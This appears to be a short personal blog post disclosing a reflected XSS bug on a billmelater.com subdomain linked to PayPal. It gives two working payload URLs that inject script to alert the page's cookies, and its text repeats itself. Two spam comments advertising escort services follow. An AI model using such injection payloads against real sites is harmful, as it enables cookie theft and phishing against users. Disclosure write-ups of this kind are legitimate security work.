Hi , some days ago found a XSS bug in Paypal Services but was not eligible to get the bounty ,well no worries will try again :D . . .
It was subdomain of billmelater.com
Bug Can be used for like phishing attacks etc
domain: http://wwwb.search.billmelater.com
They are getting integer value from the GET Field and using it as time to redirect you on other pages..
Vuln Link :
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert(document.cookie)</script>
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert("XSS by Saadat")</script>
ScreenShot
So this is for today :)
#IndependentPakistaniSecurityResearcher
It was subdomain of billmelater.com
Bug Can be used for like phishing attacks etc
domain: http://wwwb.search.billmelater.com
They are getting integer value from the GET Field and using it as time to redirect you on other pages..
Vuln Link :
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert(document.cookie)</script>
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert("XSS by Saadat")</script>
ScreenShot
#IndependentPakistaniSecurityResearcher
2 comments:
Lots of interesting information I can find here.
London Escorts Agency
Awesome piece of work. Polish girls
Post a Comment